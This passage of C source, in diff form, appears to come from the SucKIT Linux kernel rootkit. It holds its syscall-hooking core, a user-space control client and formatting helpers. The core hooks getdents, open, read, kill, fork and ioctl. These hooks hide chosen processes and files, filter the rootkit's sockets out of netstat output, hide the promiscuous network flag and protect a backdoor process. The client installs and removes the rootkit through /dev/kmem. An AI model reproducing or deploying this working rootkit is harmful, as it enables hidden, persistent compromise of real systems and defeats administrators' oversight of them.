+/* ehrm. ehrm. 8 gotos at one page of code ? uglyneees ;)
+   this is code strips (i hope ;) "bad" things from netstat, etc. */
+int     strip_net(char *src, char *dest, int size, int *net_tab,
+                  int ncount)
+{
+        char   *ptr = src;
+        char   *bline = src;
+        int     temp;
+        int     ret = 0;
+        int     i;
+
+rnext:
+        if (ptr >= (src + size))
+                goto rlast;
+        if ((ptr - bline) > 0) {
+                memcpy(dest, bline, ptr - bline);
+                dest += ptr - bline;
+                ret += ptr - bline;
+        }
+        bline = ptr;
+        for (i = 0; i < 9; i++) {
+                while (*ptr == ' ') {
+                        if (ptr >= (src + size))
+                                goto rlast;
+                        if (*ptr == '\n')
+                                goto rnext;
+                        ptr++;
+                }
+                while (*ptr != ' ') {
+                        if (ptr >= (src + size))
+                                goto rlast;
+                        if (*ptr == '\n')
+                                goto rnext;
+                        ptr++;
+                }
+                if (ptr >= (src + size))
+                        goto rlast;
+        }
+        temp = my_atoi(ptr);
+        while (*ptr != '\n') {
+                ptr++;
+                if (ptr >= (src + size))
+                        goto rlast;
+        }
+        ptr++;
+        if (invisible_socket(temp, net_tab, ncount))
+                bline = ptr;
+        goto rnext;
+rlast:
+        if ((ptr - bline) > 0) {
+                memcpy(dest, bline, ptr - bline);
+                ret += ptr - bline;
+        }
+        return ret;
+}
+
+
+#define NTSIZE  384
+struct  net_struc *create_net_struc(int fd)
+{
+        int             size = 0;
+        struct  de      *de = NULL;
+        struct  net_struc *ns = NULL;
+        char            *tmp = NULL;
+        int             net_tab[NTSIZE];
+        int             ncount;
+        int             nsize;
+
+        crd("fd=%d", fd);
+
+        tmp = ualloc(PAGE_SIZE);
+        do {
+                nsize = old_read(fd, tmp, PAGE_SIZE);
+                if (nsize < 0) {
+                        ufree(tmp, PAGE_SIZE);
+                        return NULL;
+                }
+                size += nsize;
+        } while (nsize == PAGE_SIZE);
+        ufree(tmp, PAGE_SIZE);
+        if (old_lseek(fd, 0, 0) != 0)
+                goto err;
+
+        tmp = ualloc(size);
+        if (!tmp)
+                goto err;
+        ns = ualloc(sizeof(struct net_struc) + size);
+        if (!ns)
+                goto err;
+        de = ualloc(sizeof(struct de));
+        if (!de)
+                goto err;
+        ns->data_len = size;
+        crd("tmp=0x%x, ns=0x%x, size=%d", tmp, ns, size);
+        ncount = create_net_tab(net_tab, NTSIZE, de, tmp);
+        if (!ncount)
+                goto err;
+        nsize = old_read(fd, tmp, size);
+        if (nsize < 0)
+                goto err;
+        old_lseek(fd, 0, 0);
+        ns->len = strip_net(tmp, ns->dat, nsize, net_tab, ncount);
+        ns->pos = 0;
+        ns->fd = fd;
+        ufree(tmp, size);
+        ufree(de, sizeof(struct de));
+        return ns;
+err:
+        ufree(ns, sizeof(struct net_struc) + size);
+        ufree(tmp, size);
+        ufree(de, sizeof(struct de));
+        return NULL;
+}
+
+static inline int       destroy_net_struc(struct net_struc **net)
+{
+        if (net && *net) {
+                ufree(*net, (*net)->data_len + sizeof(struct net_struc));
+                *net = NULL;
+                return 1;
+        }
+        return 0;
+}
+
+/****************************** syscalls ! ***********************/
+/* I/O with userspace */
+int     new_olduname(char *buf)
+{
+#define cmdp ((struct cmd_struc *) buf)
+        if (cmdp->id == OUR_SIGN) {
+                switch (cmdp->cmd) {
+                        case CMD_TST:
+                                cmdp->num = OUR_SIGN;
+                                strcpy(cmdp->buf, SUCKIT_VERSION);
+                                return 0;
+                        case CMD_INV:
+                                if (hide_pid(cmdp->num))
+                                        return 0;
+                                return -1;
+                        case CMD_VIS:
+                                if (unhide_pid(cmdp->num))
+                                        return 0;
+                                return -1;
+                        case CMD_GFL:
+                                cmdp->num = our_flags;
+                                return 0;
+                        case CMD_SFL:
+                                our_flags = cmdp->num;
+                                return 0;
+                        case CMD_RMV:
+                                if (backdoor_pid)
+                                        old_kill(backdoor_pid, 9);
+                                cmdp->cmd = syscall_dispatch;
+                                cmdp->num = old_call_table;
+                                return 0;
+                        case CMD_BDR:
+                                backdoor_pid = cmdp->num;
+                                hide_pid(cmdp->num);
+                                return 0;
+                        default:
+                                return -1;
+                }
+        }
+        return old_olduname(buf);
+#undef cmdp
+}
+
+int     new_fork(struct pt_regs regs)
+{
+        struct  pid_struc *parent;
+        int     pid;
+
+        sync_pid_tab();
+        parent = curr_pid();
+
+        pid = old_fork(regs);
+        if (pid > 0) {
+                if ((parent) && (parent->hidden)) {
+                        register struct pid_struc *new;
+                        new = add_pid(pid);
+                        if (new)
+                                new->hidden = 1;
+                }
+        }
+        return pid;
+}
+
+int     new_clone(struct pt_regs regs)
+{
+        struct  pid_struc *parent;
+        int     pid;
+
+        sync_pid_tab();
+        parent = curr_pid();
+
+        pid = old_clone(regs);
+        if (pid > 0) {
+                if ((parent) && (parent->hidden)) {
+                        register struct pid_struc *new;
+                        new = add_pid(pid);
+                        if (new)
+                                new->hidden = 1;
+                }
+        }
+        return pid;
+}
+
+/* cache info about "bad" files (/proc/net/tcp etc) */
+#define NSIZE   256
+void    cache_bads()
+{
+        struct  stat *buf;
+        char    *n;
+
+        buf = ualloc(sizeof(struct stat) + NSIZE);
+        n = (char *) (((ulong) buf) + sizeof(struct stat));
+        crd("buf = 0x%x, n = 0x%x", buf, n);
+        if (!buf) return;
+        strcpy(n, BAD1);
+        if (old_stat(n, buf) == 0) {
+                bdev = buf->st_dev;
+                bad1 = buf->st_ino;
+                crd("bdev = %d, bad1 = %d", bdev, bad1);
+        }
+        strcpy(n, BAD2);
+        if (old_stat(n, buf) == 0)
+                bad2 = buf->st_ino;
+        strcpy(n, BAD3);
+        if (old_stat(n, buf) == 0)
+                bad3 = buf->st_ino;
+        crd("bad2 = %d, bad3 = %d", bad2, bad3);
+        ufree(buf, sizeof(struct stat) + NSIZE);
+}
+
+int     new_open(char *path, int flags, int mode)
+{
+        int     fd;
+        struct  stat *buf = NULL;
+        if (bdev == -1)
+                cache_bads();
+        fd = old_open(path, flags, mode);
+        if (fd < 0) goto err;
+
+        buf = ualloc(sizeof(struct stat));
+        if (!buf) {
+                old_close(fd);
+                return -ENOMEM;
+        }
+        if (old_fstat(fd, buf) == 0) {
+                if ( (buf->st_dev == bdev) &&
+                     (buf->st_ino == bad1 || buf->st_ino == bad2 ||
+                      buf->st_ino == bad3) ) {
+                        struct  pid_struc *p;
+                        p = add_pid(old_getpid());
+                        destroy_net_struc(&p->net);
+                        p->net = create_net_struc(fd);
+                        if (!p->net) {
+                                old_close(fd);
+                                fd = -ENOMEM;
+                                goto err;
+                        }
+                }
+        } else {
+                old_close(fd);
+                return -EPERM;
+        }
+err:
+        ufree(buf, sizeof(struct stat));
+        return fd;
+}
+
+int     new_read(int fd, char *buf, uint count)
+{
+        struct  pid_struc *p = curr_pid();
+        /* fake netinfo file ;) */
+        if ((p) && (p->net) && (p->net->fd == fd)) {
+                if ((count + p->net->pos) > p->net->len) {
+                        count = p->net->len - p->net->pos;
+                }
+                crd("count (after) = %d", count);
+                if ((p->net->pos >= p->net->len) ||
+                    (count == 0)) return 0;
+                memcpy(buf, p->net->dat + p->net->pos, count);
+                p->net->pos += count;
+                return count;
+        }
+        return old_read(fd, buf, count);
+}
+
+int     new_close(int fd)
+{
+        struct  pid_struc *p = curr_pid();
+        if ((p) && (p->net) && (p->net->fd == fd)) {
+                destroy_net_struc(&p->net);
+        }
+        return old_close(fd);
+}
+
+int     new_kill(int pid, int sig)
+{
+        struct  pid_struc *p;
+        int     t = pid;
+
+        if (pid < -1)
+                t = -pid;
+        p = find_pid(t);
+        if ((p) && (p->hidden)) {
+                register int cpid = old_getpid();
+                if (cpid == 1) goto ok;
+                p = find_pid(cpid);
+                if ((p) && (p->hidden)) goto ok;
+                return -ESRCH;
+        }
+ok:
+        return old_kill(pid, sig);
+}
+
+int     is_hidden(char *s, uint inode)
+{
+        int     c = 0;
+        struct pid_struc *p;
+
+        if (!HIDE_PROCS) return 0;
+        while (*s) {
+                if ((*s < '0') || (*s > '9'))
+                        return 0;
+                c = c * 10 + (*s++) - '0';
+        }
+        if (((inode - 2) / 65536) != c) return 0;
+        p = find_pid(c);
+        if (!p)
+                return 0;
+        if (p->hidden)
+                return 1;
+        return 0;
+}
+
+/* this strips "hidden" files and pid's from /proc listening */
+int     new_getdents(uint fd, struct de *dirp, int count)
+{
+        struct  de      *dbuf = NULL;
+        struct  de      *prev = NULL;
+        char    register *ptr;
+        char            *cpy;
+        int             oldlen, newlen;
+        int             hslen = strlen(cfg.hs);
+
+        oldlen = newlen = old_getdents(fd, dirp, count);
+        if (oldlen <= 0)
+                goto outta;
+        cpy = ptr = ualloc(oldlen);
+        if (!ptr)
+                return -ENOMEM;
+        dbuf = (struct de *) cpy;
+        memcpy(ptr, dirp, oldlen);
+        memset(dirp, 0, oldlen);
+#define dp ((struct de *) ptr)
+        while ((ulong) ptr < (ulong) dbuf + oldlen) {
+                int register size = dp->d_reclen;
+                int zlen = strlen(dp->d_name);
+                if (is_hidden(dp->d_name, dp->d_ino) ||
+                   (HIDE_FILES && (zlen >= hslen) &&
+                    (!strcmp(cfg.hs, &dp->d_name[zlen - hslen]))) ) {
+                        if (!prev) {
+                                newlen -= size;
+                                cpy += size;
+                        } else {
+                                prev->d_reclen += size;
+                                memset(dp, 0, size);
+                        }
+                } else {
+                        prev = dp;
+                }
+                ptr += size;
+        }
+        if (newlen) memcpy(dirp, cpy, newlen);
+outta:
+        ufree(dbuf, oldlen);
+        return newlen;
+#undef dp
+}
+
+/* this strips "hidden" files and pid's from /proc listening */
+int     new_getdents64(uint fd, struct de64 *dirp, int count)
+{
+        struct  de64    *dbuf = NULL;
+        struct  de64    *prev = NULL;
+        char    register *ptr;
+        char            *cpy;
+        int             oldlen, newlen;
+        int             hslen = strlen(cfg.hs);
+
+        oldlen = newlen = old_getdents64(fd, dirp, count);
+        if (oldlen <= 0)
+                goto outta;
+        cpy = ptr = ualloc(oldlen);
+        if (!ptr)
+                return -ENOMEM;
+        dbuf = (struct de64 *) cpy;
+        memcpy(ptr, dirp, oldlen);
+        memset(dirp, 0, oldlen);
+#define dp ((struct de64 *) ptr)
+        while ((ulong) ptr < (ulong) dbuf + oldlen) {
+                int register size = dp->d_reclen;
+                int zlen = strlen(dp->d_name);
+                if (is_hidden(dp->d_name, dp->d_ino) ||
+                   (HIDE_FILES && (zlen >= hslen) &&
+                    (!strcmp(cfg.hs, &dp->d_name[zlen - hslen]))) ) {
+                        if (!prev) {
+                                newlen -= size;
+                                cpy += size;
+                        } else {
+                                prev->d_reclen += size;
+                                memset(dp, 0, size);
+                        }
+                } else {
+                        prev = dp;
+                }
+                ptr += size;
+        }
+        if (newlen) memcpy(dirp, cpy, newlen);
+outta:
+        ufree(dbuf, oldlen);
+        return newlen;
+#undef dp
+}
+
+/* hide the PROMISC flag */
+int     new_ioctl(uint fd, uint cmd, ulong arg)
+{
+        int     ret;
+#define ifr ((struct ifreq *) arg)
+        ret = old_ioctl(fd, cmd, arg);
+        if (ret < 0) goto err;
+        if ((cmd == SIOCGIFFLAGS) && (ifr) && (ifr->ifr_flags & IFF_UP))
+                ifr->ifr_flags &= ~IFF_PROMISC;
+err:
+        return ret;
+}
+#endif
+<--> ./src/core.c
+<++> ./src/client.c
+/* $Id: client.c, stuff between user <=> kernel */
+
+#ifndef CLIENT_C
+#define CLIENT_C
+#include "io.c"
+#include "string.c"
+#include "vsprintf.c"
+#include "config.c"
+
+/* howto */
+int     usage(char *s)
+{
+        printf(
+                "Usage:\n"
+                "%s [command] [arg]\n"
+                "Commands:\n"
+                "  u          uninstall\n"
+                "  t          test\n"
+                "  i <pid>    make pid invisible\n"
+                "  v <pid>    make pid visible (0 = all)\n"
+                "  f [0/1]    toggle file hiding\n"
+                "  p [0/1]    toggle proc hiding\n"
+                "configuration:\n"
+                "  c <hidestr> <password> <home>\n"
+                "invoking without args will install rewtkit into memory\n"
+                , s);
+        return 0;
+}
+
+/* ???! */
+int     skio(int cmd, struct cmd_struc *c)
+{
+        c->id = OUR_SIGN;
+        c->cmd = cmd;
+        if (olduname(c) != 0) {
+                return 0;
+        } else {
+                return 1;
+        }
+}
+
+/* only check for us */
+int     fucka_is_there()
+{
+        struct  cmd_struc c;
+        c.cmd = CMD_TST;
+        c.id = OUR_SIGN;
+        olduname(&c);
+        if (c.num == OUR_SIGN) {
+                printf("Currently installed version: %s\n", c.buf);
+                return 1;
+        }
+        return 0;
+}
+
+/* client side */
+int     client(int kernel, int argc, char *argv[])
+{
+        struct  cmd_struc c;
+        int     i;
+        int     our_flags;
+
+        if (argc < 2) return usage(argv[0]);
+        if (((*(argv[1]) & 0xDF) != 'C') && (!kernel))
+                return usage(argv[0]);
+        if (kernel) skio(CMD_GFL, &c);
+        our_flags = c.num;
+        switch (*(argv[1]) & 0xDF) {
+                case 'C':
+                        if (argc != 5) return (usage(argv[0]));
+                        return config(argv[0], argv[2], argv[3], argv[4]);
+                case 'U':
+                        printf("Removing from memory...");
+                        skio(CMD_RMV, &c);
+                        i = open(KMEM_FILE, O_WRONLY, 0);
+                        if (i < 0) {
+                                printf("Can't open %s for writing (%d)\n",
+                                       KMEM_FILE, -errno);
+                                return 1;
+                        }
+                        if (!wkml(i, c.cmd, c.num)) {
+                                printf("Failed\n");
+                                close(i);
+                                return 1;
+                        }
+                        close(i);
+                        printf("OK, previous call dispatch 0x%08x at"
+                               " 0x%08x restored.\n", c.num, c.cmd);
+                        return 0;
+                case 'T':
+                        printf("Test OK.\n");
+                        return 0;
+                case 'I':
+                        if ((argc < 3) || (sscanf(argv[2], "%d", &i) != 1))
+                                return usage(argv[0]);
+                        c.num = i;
+                        printf("Making pid %d invisible...", i);
+                        if (skio(CMD_INV, &c)) {
+                                printf("OK\n");
+                                return 0;
+                        }
+                        printf("Failed\n");
+                        return 1;
+                case 'V':
+                        if ((argc < 3) || (sscanf(argv[2], "%d", &i) != 1))
+                                return usage(argv[0]);
+                        c.num = i;
+                        if (i != 0)
+                                printf("Making pid %d visible...", i);
+                        else
+                                printf("Making all pid's visible...");
+                        if (skio(CMD_VIS, &c)) {
+                                printf("OK\n");
+                                return 0;
+                        }
+                        printf("Failed\n");
+                        return 1;
+                case 'F':
+                        if (argc >= 3) {
+                                if (!((argv[2][0] == '0') ||
+                                      (argv[2][0] == '1'))) {
+                                        return usage(argv[0]);
+                                }
+                                if (argv[2][0] == '0')
+                                        our_flags &= ~CMD_FLAG_HF;
+                                else
+                                        our_flags |= CMD_FLAG_HF;
+                        } else {
+                                our_flags ^= CMD_FLAG_HF;
+                        }
+                        printf("File hiding %s...",
+                                (our_flags & CMD_FLAG_HF) ? "ON" : "OFF");
+                        c.num = our_flags;
+                        if (skio(CMD_SFL, &c)) {
+                                printf("OK\n");
+                                return 0;
+                        }
+                        printf("Failed\n");
+                        return 1;
+                case 'P':
+                        if (argc >= 3) {
+                                if (!((argv[2][0] == '0') ||
+                                      (argv[2][0] == '1'))) {
+                                        return usage(argv[0]);
+                                }
+                                if (argv[2][0] == '0')
+                                        our_flags &= ~CMD_FLAG_HP;
+                                else
+                                        our_flags |= CMD_FLAG_HP;
+                        } else {
+                                our_flags ^= CMD_FLAG_HP;
+                        }
+                        printf("Proc hiding %s...",
+                                (our_flags & CMD_FLAG_HP) ? "ON" : "OFF");
+                        c.num = our_flags;
+                        if (skio(CMD_SFL, &c)) {
+                                printf("OK\n");
+                                return 0;
+                        }
+                        printf("Failed\n");
+                        return 1;
+        }
+        return usage(argv[0]);
+}
+
+#endif
+<--> ./src/client.c
+<++> ./src/gfp.c
+/* $Id: gfp.c, needs to be improved, takes care about GFP_KERNEL flag */
+
+#ifndef GFP_C
+#define GFP_C
+#include "io.c"
+
+#define NEW_GFP         KMEM_FLAGS
+#define OLD_GFP         0x3
+
+/* uname struc */
+struct un {
+        char    sysname[65];
+        char    nodename[65];
+        char    release[65];
+        char    version[65];
+        char    machine[65];
+        char    domainname[65];
+};
+
+int     get_gfp()
+{
+        struct un s;
+        uname(&s);
+        if ((s.release[0] == '2') && (s.release[2] == '4') &&
+            (s.release[4] >= '6' ||
+             (s.release[5] >= '0' && s.release[5] <= '9'))) {
+                return NEW_GFP;
+        }
+        return OLD_GFP;
+}
+#endif
+<--> ./src/gfp.c
+<++> ./src/vsprintf.c
+/* $Id: vsprintf.c, modified linus' vsprintf.c, thanx to him, whatever */
+
+#ifndef VSPRINTF_C
+#define VSPRINTF_C
+#define isdigit(x) ((x >= '0') && (x <= '9'))
+#define isxdigit(x) (isdigit(x) || (x >= 'a' && \
+                     x <= 'f') || (x >= 'A' && x <= 'F'))
+#define islower(x) ((x >= 'a') && (x <= 'z'))
+#define isspace(x) (x==' ' || x=='\t' || x=='\n' \
+                    || x=='\r' || x=='\f' || x=='\v')
+#define toupper(x) (x & 0xDF)
+#define do_div(n,base) ({ \
+int __res; \
+__res = ((unsigned long) n) % (unsigned) base; \
+n = ((unsigned long) n) / (unsigned) base; \
+__res; })
+
+
+unsigned long simple_strtoul(const char *cp,char **endp,unsigned int base)
+{
+        unsigned long result = 0,value;
+
+        if (!base) {
+                base = 10;
+                if (*cp == '0') {
+                        base = 8;
+                        cp++;
+                        if ((*cp == 'x') && isxdigit(cp[1])) {
+                                cp++;
+                                base = 16;
+                        }
+                }
+        }
+        while (isxdigit(*cp) &&
+               (value = isdigit(*cp) ? *cp-'0' :
+                toupper(*cp)-'A'+10) < base) {
+                result = result*base + value;
+                cp++;
+        }
+        if (endp)
+                *endp = (char *)cp;
+        return result;
+}
+
+long simple_strtol(const char *cp,char **endp,unsigned int base)
+{
+        if(*cp=='-')
+                return -simple_strtoul(cp+1,endp,base);
+        return simple_strtoul(cp,endp,base);
+}
+
+unsigned long long simple_strtoull(const char *cp,char **endp,
+                                   unsigned int base)
+{
+        unsigned long long result = 0,value;
+
+        if (!base) {
+                base = 10;
+                if (*cp == '0') {
+                        base = 8;
+                        cp++;
+                        if ((*cp == 'x') && isxdigit(cp[1])) {
+                                cp++;
+                                base = 16;
+                        }
+                }
+        }
+        while (isxdigit(*cp) && (value = isdigit(*cp) ? *cp-'0' :
+               (islower(*cp) ? toupper(*cp) : *cp)-'A'+10) < base) {
+                result = result*base + value;
+                cp++;
+        }
+        if (endp)
+                *endp = (char *)cp;
+        return result;
+}
+
+long long simple_strtoll(const char *cp,char **endp,unsigned int base)
+{
+        if(*cp=='-')
+                return -simple_strtoull(cp+1,endp,base);
+        return simple_strtoull(cp,endp,base);
+}
+
+static int skip_atoi(const char **s)
+{
+        int i=0;
+
+        while (isdigit(**s))
+                i = i*10 + *((*s)++) - '0';
+        return i;
+}
+
+#define ZEROPAD 1               /* pad with zero */
+#define SIGN    2               /* unsigned/signed long */
+#define PLUS    4               /* show plus */
+#define SPACE   8               /* space if plus */
+#define LEFT    16              /* left justified */
+#define SPECIAL 32              /* 0x */
+#define LARGE   64              /* use 'ABCDEF' instead of 'abcdef' */
+
+static char * number(char * buf, char * end, long long num, int base,
+                     int size, int precision, int type)
+{
+        char c,sign,tmp[66];
+        const char *digits;
+        const char small_digits[] = "0123456789abcdefghijklmnopqrstuvwxyz";
+        const char large_digits[] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ";
+        int i;
+
+        digits = (type & LARGE) ? large_digits : small_digits;
+        if (type & LEFT)
+                type &= ~ZEROPAD;
+        if (base < 2 || base > 36)
+                return 0;
+        c = (type & ZEROPAD) ? '0' : ' ';
+        sign = 0;
+        if (type & SIGN) {
+                if (num < 0) {
+                        sign = '-';
+                        num = -num;
+                        size--;
+                } else if (type & PLUS) {
+                        sign = '+';
+                        size--;
+                } else if (type & SPACE) {
+                        sign = ' ';
+                        size--;
+                }
+        }
+        if (type & SPECIAL) {
+                if (base == 16)
+                        size -= 2;
+                else if (base == 8)
+                        size--;
+        }
+        i = 0;
+        if (num == 0)
+                tmp[i++]='0';
+        else while (num != 0)
+                tmp[i++] = digits[do_div(num,base)];
+        if (i > precision)
+                precision = i;
+        size -= precision;
+        if (!(type&(ZEROPAD+LEFT))) {
+                while(size-->0) {
+                        if (buf <= end)
+                                *buf = ' ';
+                        ++buf;
+                }
+        }
+        if (sign) {
+                if (buf <= end)
+                        *buf = sign;
+                ++buf;
+        }
+        if (type & SPECIAL) {
+                if (base==8) {
+                        if (buf <= end)
+                                *buf = '0';
+                        ++buf;
+                } else if (base==16) {
+                        if (buf <= end)
+                                *buf = '0';
+                        ++buf;
+                        if (buf <= end)
+                                *buf = digits[33];
+                        ++buf;
+                }
+        }
+        if (!(type & LEFT)) {
+                while (size-- > 0) {
+                        if (buf <= end)
+                                *buf = c;
+                        ++buf;
+                }
+        }
+        while (i < precision--) {
+                if (buf <= end)
+                        *buf = '0';
+                ++buf;
+        }
+        while (i-- > 0) {
+                if (buf <= end)
+                        *buf = tmp[i];
+                ++buf;
+        }
+        while (size-- > 0) {
+                if (buf <= end)
+                        *buf = ' ';
+                ++buf;
+        }
+        return buf;
+}
+
+int vsnprintf(char *buf, unsigned int size, const char *fmt, va_list args)
+{
+        int len;
+        unsigned long long num;
+        int i, base;
+        char *str, *end, c;
+        const char *s;
+
+        int flags;              /* flags to number() */
+
+        int field_width;        /* width of output field */
+        int precision;          /* min. # of digits for integers; max
+                                   number of chars for from string */
+        int qualifier;          /* 'h', 'l', or 'L' for integer fields */
+                                /* 'z' support added 23/7/1999 S.H.    */
+                                /* 'z' changed to 'Z' --davidm 1/25/99 */
+
+        str = buf;
+        end = buf + size - 1;
+
+        if (end < buf - 1) {
+                end = ((void *) -1);
+                size = end - buf + 1;
+        }
+
+        for (; *fmt ; ++fmt) {
+                if (*fmt != '%') {
+                        if (str <= end)
+                                *str = *fmt;
+                        ++str;
+                        continue;
+                }
+
+                /* process flags */
+                flags = 0;
+                repeat:
+                        ++fmt;          /* this also skips first '%' */
+                        switch (*fmt) {
+                                case '-': flags |= LEFT; goto repeat;
+                                case '+': flags |= PLUS; goto repeat;
+                                case ' ': flags |= SPACE; goto repeat;
+                                case '#': flags |= SPECIAL; goto repeat;
+                                case '0': flags |= ZEROPAD; goto repeat;
+                        }
+
+                /* get field width */
+                field_width = -1;
+                if (isdigit(*fmt))
+                        field_width = skip_atoi(&fmt);
+                else if (*fmt == '*') {
+                        ++fmt;
+                        /* it's the next argument */
+                        field_width = va_arg(args, int);
+                        if (field_width < 0) {
+                                field_width = -field_width;
+                                flags |= LEFT;
+                        }
+                }
+
+                /* get the precision */
+                precision = -1;
+                if (*fmt == '.') {
+                        ++fmt;
+                        if (isdigit(*fmt))
+                                precision = skip_atoi(&fmt);
+                        else if (*fmt == '*') {
+                                ++fmt;
+                                /* it's the next argument */
+                                precision = va_arg(args, int);
+                        }
+                        if (precision < 0)
+                                precision = 0;
+                }
+
+                /* get the conversion qualifier */
+                qualifier = -1;
+                if (*fmt == 'h' || *fmt == 'l' || *fmt == 'L' ||
+                    *fmt =='Z') {
+                        qualifier = *fmt;
+                        ++fmt;
+                        if (qualifier == 'l' && *fmt == 'l') {
+                                qualifier = 'L';
+                                ++fmt;
+                        }
+                }
+
+                /* default base */
+                base = 10;
+
+                switch (*fmt) {
+                        case 'c':
+                                if (!(flags & LEFT)) {
+                                        while (--field_width > 0) {
+                                                if (str <= end)
+                                                        *str = ' ';
+                                                ++str;
+                                        }
+                                }
+                                c = (unsigned char) va_arg(args, int);
+                                if (str <= end)
+                                        *str = c;
+                                ++str;
+                                while (--field_width > 0) {
+                                        if (str <= end)
+                                                *str = ' ';
+                                        ++str;
+                                }
+                                continue;
+
+                        case 's':
+                                s = va_arg(args, char *);
+                                if (!s)
+                                        s = "<NULL>";
+
+                                len = strnlen(s, precision);
+
+                                if (!(flags & LEFT)) {
+                                        while (len < field_width--) {
+                                                if (str <= end)
+                                                        *str = ' ';
+                                                ++str;
+                                        }
+                                }
+                                for (i = 0; i < len; ++i) {
+                                        if (str <= end)
+                                                *str = *s;
+                                        ++str; ++s;
+                                }
+                                while (len < field_width--) {
+                                        if (str <= end)
+                                                *str = ' ';
+                                        ++str;
+                                }
+                                continue;
+
+                        case 'p':
+                                if (field_width == -1) {
+                                        field_width = 2*sizeof(void *);
+                                        flags |= ZEROPAD;
+                                }
+                                str = number(str, end,
+                                (unsigned long) va_arg(args, void *),
+                                16, field_width, precision, flags);
+                                continue;
+
+
+                        case 'n':
+                                if (qualifier == 'l') {
+                                        long * ip = va_arg(args, long *);
+                                        *ip = (str - buf);
+                                } else if (qualifier == 'Z') {
+                                        unsigned int * ip =
+                                        va_arg(args, unsigned int *);
+                                        *ip = (str - buf);
+                                } else {
+                                        int * ip = va_arg(args, int *);
+                                        *ip = (str - buf);
+                                }
+                                continue;
+
+                        case '%':
+                                if (str <= end)
+                                        *str = '%';
+                                ++str;
+                                continue;
+
+                        case 'o':
+                                base = 8;
+                                break;
+
+                        case 'X':
+                                flags |= LARGE;
+                        case 'x':
+                                base = 16;
+                                break;
+
+                        case 'd':
+                        case 'i':
+                                flags |= SIGN;
+                        case 'u':
+                                break;
+
+                        default:
+                                if (str <= end)
+                                        *str = '%';
+                                ++str;
+                                if (*fmt) {
+                                        if (str <= end)
+                                                *str = *fmt;
+                                        ++str;
+                                } else {
+                                        --fmt;
+                                }
+                                continue;
+                }
+                if (qualifier == 'L')
+                        num = va_arg(args, long long);
+                else if (qualifier == 'l') {
+                        num = va_arg(args, unsigned long);
+                        if (flags & SIGN)
+                                num = (signed long) num;
+                } else if (qualifier == 'Z') {
+                        num = va_arg(args, unsigned int);
+                } else if (qualifier == 'h') {
+                        num = (unsigned short) va_arg(args, int);
+                        if (flags & SIGN)
+                                num = (signed short) num;
+                } else {
+                        num = va_arg(args, unsigned int);
+                        if (flags & SIGN)
+                                num = (signed int) num;
+                }
+                str = number(str, end, num, base,
+                                field_width, precision, flags);
+        }
+        if (str <= end)
+                *str = '\0';
+        else if (size > 0)
+                *end = '\0';
+        return str-buf;
+}
+
+int snprintf(char * buf, unsigned int size, const char *fmt, ...)
+{
+        va_list args;
+        int i;
+
+        va_start(args, fmt);
+        i=vsnprintf(buf,size,fmt,args);
+        va_end(args);
+        return i;
+}
+
+int vsprintf(char *buf, const char *fmt, va_list args)
+{
+        return vsnprintf(buf, 0xFFFFFFFFUL, fmt, args);
+}
+
+int sprintf(char * buf, const char *fmt, ...)
+{
+        va_list args;
+        int i;
+
+        va_start(args, fmt);
+        i=vsprintf(buf,fmt,args);
+        va_end(args);
+        return i;
+}
+
+int vsscanf(const char * buf, const char * fmt, va_list args)
+{
+        const char *str = buf;
+        char *next;
+        int num = 0;
+        int qualifier;
+        int base;
+        unsigned int field_width;
+        int is_sign = 0;
+
+        for (; *fmt; fmt++) {
+                if (isspace(*fmt)) {
+                        continue;
+                }
+
+                if (*fmt != '%') {
+                        if (*fmt++ != *str++)
+                                return num;
+                        continue;
+                }
+                ++fmt;
+
+                if (*fmt == '*') {
+                        while (!isspace(*fmt))
+                                fmt++;
+                        while(!isspace(*str))
+                                str++;
+                        continue;
+                }
+
+                field_width = 0xffffffffUL;
+                if (isdigit(*fmt))
+                        field_width = skip_atoi(&fmt);
+
+                qualifier = -1;
+                if (*fmt == 'h' || *fmt == 'l' ||
+                    *fmt == 'L' || *fmt == 'Z') {
+                        qualifier = *fmt;
+                        fmt++;
+                }
+                base = 10;
+                is_sign = 0;
+
+                switch(*fmt) {
+                case 'c':
+                {
+                        char *s = (char *) va_arg(args,char*);
+                        do {
+                                *s++ = *str++;
+                        } while(field_width-- > 0);
+                        num++;
+                }
+                continue;
+                case 's':
+                {
+                        char *s = (char *) va_arg(args, char *);
+                        while (isspace(*str))
+                                str++;
+
+                        while (!isspace(*str) && field_width--) {
+                                *s++ = *str++;
+                        }
+                        *s = '\0';
+                        num++;
+                }
+                continue;
+                case 'n':
+                {
+                        int *i = (int *)va_arg(args,int*);
+                        *i = str - buf;
+                }
+                continue;
+                case 'o':
+                        base = 8;
+                        break;
+                case 'x':
+                case 'X':
+                        base = 16;
+                        break;
+                case 'd':
+                case 'i':
+                        is_sign = 1;
+                case 'u':
+                        break;
+                case '%':
+                        if (*str++ != '%')
+                                return num;
+                        continue;
+                default:
+                        return num;
+                }
+
+                while (isspace(*str))
+                        str++;
+
+                switch(qualifier) {
+                case 'h':
+                        if (is_sign) {
+                                short *s = (short *) va_arg(args,short *);
+                                *s = (short) simple_strtol(str,&next,base);
+                        } else {
+                                unsigned short *s =
+                                        (unsigned short *)
+                                        va_arg(args, unsigned short *);
+                                *s = (unsigned short)
+                                        simple_strtoul(str, &next, base);
+                        }
+                        break;
+                case 'l':
+                        if (is_sign) {
+                                long *l = (long *) va_arg(args,long *);
+                                *l = simple_strtol(str,&next,base);
+                        } else {
+                                unsigned long *l = (unsigned long*)
+                                        va_arg(args,unsigned long*);
+                                *l = simple_strtoul(str,&next,base);
+                        }
+                        break;
+                case 'L':
+                        if (is_sign) {
+                                long long *l = (long long*)
+                                        va_arg(args,long long *);
+                                *l = simple_strtoll(str,&next,base);
+                        } else {
+                                unsigned long long *l =
+                                        (unsigned long long*)
+                                        va_arg(args,unsigned long long*);
+                                *l = simple_strtoull(str,&next,base);
+                        }
+                        break;
+                case 'Z':
+                {
+                        unsigned int *s = (unsigned int*)
+                                        va_arg(args,unsigned int*);
+                        *s = (unsigned int) simple_strtoul(str,&next,base);
+                }
+                break;
+                default:
+                        if (is_sign) {
+                                int *i = (int *) va_arg(args, int*);
+                                *i = (int) simple_strtol(str,&next,base);
+                        } else {
+                                unsigned int *i = (unsigned int*)
+                                        va_arg(args, unsigned int*);
+                                *i = (unsigned int)
+                                        simple_strtoul(str,&next,base);
+                        }
+                        break;
+                }
+                num++;
+
+                if (!next)
+                        break;
+                str = next;
+        }
+        return num;
+}
+
+int sscanf(const char * buf, const char * fmt, ...)
+{
+        va_list args;
+        int i;
+
+        va_start(args,fmt);
